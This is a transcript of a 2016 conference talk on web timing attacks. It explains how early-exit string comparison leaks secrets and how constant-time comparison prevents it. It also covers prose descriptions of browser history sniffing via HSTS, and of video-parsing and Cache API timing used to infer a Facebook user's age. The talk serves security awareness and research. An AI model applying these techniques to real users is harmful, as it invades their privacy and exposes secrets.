Front-End Performance: The Dark Side by Mathias Bynens
This is the third talk in a set of three talks on Technical Performance delivered on April 1, 2016 at Fronteers Spring Conference in Amsterdam
In security-sensitive situations, performance can actually be a bug rather than a feature. This presentation covers timing attacks on the web, and demonstrates how modern performance-related web APIs can sometimes have a negative security impact.
So our third speaker of the section is kind of a long-term friend of Fronteers'.
You'll have seen him around at Fronteers before, either-- [CLAP] --the sound of one hand clapping.
Yeah, you will have seen him either in the October event.
You've maybe seen him in Belgium, where he's kind of getting Fronteers up and running there as well.
Also delivered kind of mind-bending lightning talks that happened in October as well.
A lot of information crammed into 10 minutes there.
So I'm interested to see what can go into 20 minutes here today.
Mathias works at the Opera where your-- Woo! Woo! First whoop of the day.
It took-- what time is it? it's 3 o'clock, and that was the first whoop of the day.
[INAUDIBLE] that awesome.
There we go.
So you have a ready made fan base.
One person who's going to cheer for the rest of the day, I'm hoping.
Websense evangelist at Opera.
And going to be talking about the dark side of front-end performance.
So make him very welcome, Mathias Bynens.
[APPLAUSE] Hi, everyone.
So I'm going to close off this block on technical performance by focusing on some security sensitive situations in which performance is actually a bad thing.
I will also demonstrate that some new performance-related web APIs can also impact security negatively.
So let's get started.
Let's start with something simple.
You would probably write a function kind of like this.
Well, maybe you wouldn't even write a function.
So let's see some examples here.
Well, OK, we compare the string Fronteers with itself, and the result is true.
And if we compare two strings that are different, the result is false.
This is exactly what we would expect.
Now, this is supposed to be about performance, so let's time how long these operations take.
Well, in the first case, it takes about 1,000 microseconds, let's say.
But if we compare the string Fronteers with an S at the end with Fronteers with a Z at the end, it also takes about 1,000 microseconds.
However, if we compare spring with thing, this operation completes in only 100 microseconds.
And if we compare CSS with XSS, we get the result in 200 microseconds.
So there's a lot of differences here between how long it takes for this function to run, depending on the different inputs that we feed it.
And just imagine how you would be implementing this if there was no way to compare strings directly.
You would have to loop over each character in the string, get its character code, and then compare those numbers one by one in the loop.
But there are some obvious performance optimizations that we can apply in such a case.
It would look probably something like this.
So the first optimization that we can do before we even get to the looping part is just check the length of these strings.
If the length of the strings is different, then we know that the strings cannot possibly be equal.
So we can just return false right away and avoid doing any more work.
This is an early exit.
Now, there is another performance optimization that we can perform from within the loop.
As soon as we find a character at a certain position that is different in between the two strings, we can also exit early and just return false right away.
There's no reason for us to be checking those remaining characters at that point.
Well, in terms of performance, the worst case scenario is really if the strings are equal, because it means you have to run through all the possible characters in each string and compare them one by one.
And only at the very end you can return true.
So looking back on our earlier results, this kind of explains why there is such a difference there.
So if we compare Fronteers with an S at the end with Fronteers with a Z at the end, the optimization number two kicks in, but there's not a lot of advantage there because the optimization only kicks in at the very last character of the string.
And at that point, well, all the work has been done anyway.
Now, if we compare spring with thing, on the other hand-- careful there.
So if you compare spring with thing, this will be a really fast operation, because these two strings have a completely different length.
So all that happens is really the checking of the length and then the return false kicks in.
Finally, if we compare CSS with XSS, the second optimization kicks in, and this time this advantage is because it's the very first character of the two strings that is already different.
So we only have to check one character.
It only hits that loop for one iteration, and after that we just return false.
And this explains the difference in timings here.
So the main thing to remember here is that we're not just getting a Boolean result out of this function call.
We can infer a lot more information about the inner workings of the function by just timing it and looking how much time it takes for the function call to complete.
And this is what is known in the cryptography world as a side channel leak, because the side channel that is being used in this case is the timing measurement.
You could say that this function, or just comparing two strings in this way, is vulnerable to a timing attack.
And that's what I'm going to be talking about today.
Now, usually this is not really a problem.
However, the problem starts when you compare some user input, for example, with a value that is supposed to remain secret.
Because all those performance optimizations that we implemented earlier are now suddenly a weakness in this code.
The very first optimization where we actually return early from the function, return false, if the length between the two strings is different, this allows us to basically figure out how many characters the secret string contains.
We can figure out the expected length just by trying a number of different inputs and measuring how long it takes for the operation to complete.
An attacker could just send one character, then two characters, then three characters.
Just time how long each of those operations take, and as soon as one of those operations takes a bit longer than all the previous ones, that's when you know you found the expected length of the secret string.
So then you know the length of the expected secret string, like the password or hash.
It could be anything that's supposed to be secret.
So then you end up within the loop.
You just create a string of the desired length, and you start with the first character.
You can start guessing for that character.
You try the character A, then B, then C, and so on.
And, again, you just time everything, and as soon as your timing measurement is a bit greater than all the previous attempts, it probably means you found the correct character, because it means the function won't return false from that iteration anymore.
It will continue on to the next character within the loop, and it will call some more code at that point.
So we can use this timing side channel to figure out pretty much all the characters in the string as well as the desired length.
And then for the final character, you would still have to brute force that one.
But at that point, it's pretty easy to do that.
So how can we avoid this kind of problem in this specific case for the comparison function? Well, if you're comparing anything sensitive in strings, you should use a safe comparison function.
This is called a constant time comparison function.
And how do you create such a function? Well, you basically just undo all those performance optimizations that we had there before.
You avoid any kind of early exits and, not only that, you also try to make sure that the function executes the same number of instructions, regardless of the input.
So here you can see, I'm still checking the length at the beginning of the function, but rather than returning early, I just store this kind of as a flag and some variable.
And I still go through the entire looping process, even though I know it won't really be necessary.
But the main goal is to make sure the function does not execute much faster depending on the input.
So this is a very simple example of a timing attack.
And you're probably wondering how we, as front-end web developers, can actually execute a timing attack on the client side and thereby attack the users of our website.
Well, here's some very simple code that you can use for this.
What you could do is you could start a timer and then load an HTML page as an image.
Now the browser will start loading this page, but when the browser tries to parse it as an image, of course it will fail, because most HTML documents aren't valid images.
And at that point, the Error Event Handler will be fired.
So at that point, you can stop the timer and just log the results.
So when I fill in the blanks here, it looks something like this.
And this very simple piece of code will give you an idea of how long it took for the user to download this particular resource.
It could be any your URL that is not an image.
So how is this useful? How could we abuse this if we were evil? Well, imagine that a given URL returns either a very big response body or a very small response body based on some property of the user.
And here's an example of that.
Let's say we're talking about a WordPress Administrator Dashboard page.
You have this one URL.
And if you're not logged in, you will be presented with a page that looks like this.
It's just a very simple log in form asking you to log in.
It will be a fairly lightweight response body.
Let's say it takes 750 milliseconds to load.
However, if the user is logged in, they will get a response body for all of this data.
So the response will be much larger, and it's fair to assume it takes a little bit longer to download as well.
Let's say it takes 1,250 milliseconds to download.
You're not supposed to be able to figure out if a user has even visited a certain website in the past.
And this tells us much more.
It tells us the user actually has an account there and is logged in at the current time.
This shouldn't be happening.
Now, this is a technique that I showed you before.
It's very simple, but it's also very crude and definitely not super accurate.
And your all performance-savvy people, so I'm sure you know what's wrong with this kind of approach.
The main problem with it is that you're measuring something that goes over the network.
And the network itself is inherently unreliable.
Also file size does not necessarily correspond to the download time because of gzip or Brotli compression that could be going on.
And for this kind of approach, it only measures the download time.
So it wouldn't know the difference.
You can actually make this technique a little bit more accurate if you just keep on repeating it a couple of times.
But the obvious downside is that then you would have to make several HTTP requests for the same resource over and over again, which brings with it its own performance problems.
So in other words, this particular approach is not very impressive or scary.
And that's also probably why we haven't seen a lot of large-scale timing attacks on the web.
But the key to improving this attack is to avoid any kind of network measurements as much as possible.
Some recent web standards, some of which are performance related, have accidentally enabled some more robust techniques that we can use to perform these timing attacks.
And I'm going to show you a couple of quick demos of fairly recent research by different people.
The first demo is called Sniffly by Jan, who gave a talk earlier.
Sniffly is a timing attack that detects the browser history for the victim.
So out of a list of domains, Sniffly can figure out if you have visited that domain before or not.
And I can tell you browsers are trying all kinds of things to prevent this kind of thing exactly from happening.
So it really shouldn't be possible and Jan still found a way to do it.
And this is how it works in a nutshell.
Maybe simplifying a little bit over here, but bear with me.
So for each domain that Sniffly checks, it starts a timer and then it loads an image off of that domain over HTTP.
Now, all these domains in the list, they use strict transport security or HSTS.
This means that if the user has visited that website before, the HSTS entry is in the browser cache.
And the browser will automatically make the request over HTTPS instead.
It won't even try to make the request over HTTP.
It will go straight to it HTTPS.
Now, the other part of the trick is that CSP is used-- Content Security Policy-- to restrict images to HTTP only.
So images are essentially blocked before they get redirected to HTTPS.
and as we saw earlier, when an image gets blocked, the error event fires, and then the timer is stopped.
And at that point, Sniffly knows how long it took for the image to be redirected from HTTP to HTTPS.
Now, if this took, let's say, 1 millisecond or something like that, then it's very likely that it didn't actually go over the network and come back with a redirect response in just the 1 millisecond.
That's way too fast.
It means the browser has automatically redirected to HTTPS because the user has visited the site before.
And the HSTS entry is in the browser cache.
However, if it took more like, let's say, 100 milliseconds, then the network request probably did occur, and this indicates that the user has not visited the domain.
I thought that was a really clever kind of attack.
And then I bumped into some other research by Tom Van Goethem, who figured out an improved technique called the video parsing timing attack.
So instead of creating an image like we did before, now you just create a video.
You point any HTML resource to it.
Well, basically anything that isn't a real video.
So use any URL that you want.
And then you can use the Suspend Events to get a kind of a notification when the download is completed.
At that point, you start the timer.
And as soon as the error event fires, this means that the browser has tried parsing this HTML file as a video, which obviously wouldn't work.
Then you just stop the timer.
So the main difference with the previous technique here is that you're not measuring the download time anymore.
You're not measuring anything that goes over the network.
They're just measuring how long it takes for the browser to figure out that, hey, this is not a video that I can decode.
And it turns out that this depends on how big the resource is.
The bigger the resource, the longer it takes for the browser to throw this error.
So this gives you a very accurate idea of how big the file is compared to another file.
With this technique, you can compare two different resources on the web and with great accuracy, say, that OK this one is apparently bigger than the other one.
Now, Tom went even a little bit further, and he improved his technique into a cache-storing timing attack.
And this uses two fairly modern WEP APIs.
It combines a fetch API with some settings to make it behave kind of similarly to the image request that we saw earlier.
And it also uses the programmable cache API that is available, not just within a service worker, but also outside of it.
So essentially it downloads a resource.
Once the download has completed, it starts the timer.
Then it times how long it takes to put this resource into the programmable cache.
And the main advantage of this technique is that you can repeat it without having to re-download the file over and over again.
You can download it once, and then just put it in the cache 1,000 times if you need a more accurate measurement.
So this is where it becomes pretty scary.
So we have a very accurate client site timing attack on our hands.
But what can we do with it, really? Well, just imagine that I work for an evil company.
Let's say it's an advertisement company that I work for, and I want to figure out as much information about my site's visitors as possible without them actually giving me that information.
I basically want to kind of invade their privacy, figure out what age groups they belong to, what their gender is, their interests.
Anything I can find out for free, I want to know.
So here's a demo of this kind of attack in action.
You're all familiar with Facebook, right? Well, on Facebook you can create a Facebook page.
And once you have a Facebook page, you can write a post to it.
And you can target these posts to specific audiences.
You can restrict the audience in terms of age, gender, location, or even languages that they speak.
So what happens in this case? Well, Yeah, so no luck there.
It's very unfortunate.
Anyway, so if you create a post like that, what happens if you try to visit it? So you get the permalink like the URL for this particular post.
And you open it up in Facebook, and if you match the criteria on your Facebook profile, then you can actually view the post.
You will get a response that looks like this.
You see the post content, the comments to the post.
Well, there aren't any comments here, but you get the idea.
There's also a list of suggested pages in the sidebar.
So the response body is kind of large.
And let's say adding this page to the cache 10 times takes 30 milliseconds, as measured through the timing attack that we saw earlier.
Now, if you view the same URL on another Facebook profile that doesn't match the criteria that we set earlier, you would get something like this instead.
It's just an error message and nothing else.
So the response body is much smaller.
And adding this page to the cache 10 times takes only 15 milliseconds.
So here's a pretty scary demo of this where everything is nicely visualized.
So here you see that we're just making six different requests.
Each request represents a Facebook post that is targeted towards a specific range of ages.
We just add them to the cache over and over again, like 1,000 times, and then we measure how long it takes to get really accurate results.
And after a couple of seconds, it already becomes clear that apparently the Facebook user this was tested on, who was 26 by the way, is in the age range from 23 to 32.
Now, once we found out this about our user, we can take it one step further and create an HTTP request for each of the specific Facebook posts for each individual age in that range.
And once again, after just a couple of seconds, it becomes quite clear which of these will be the real age of our victim.
In this case 26 years.
So, of course, this demo visualizes everything into these moving charts, and it's fairly fancy.
But the scary part is that this could be happening in the background while you're visiting any website whatsoever.
You could be reading an article or watching a video, and the website could be using this timing attack to figure out all this information about you and basically invade your privacy without you ever knowing about it.
I think this is something that warrants more discussion.
So, yeah, pretty scary stuff.
And if you want to find out more about this, check out the resources and the research I used in this talk.
Also there is a bonus link with more examples of timing attacks on the web by Eduardo Villa.
So check it out if you're interested.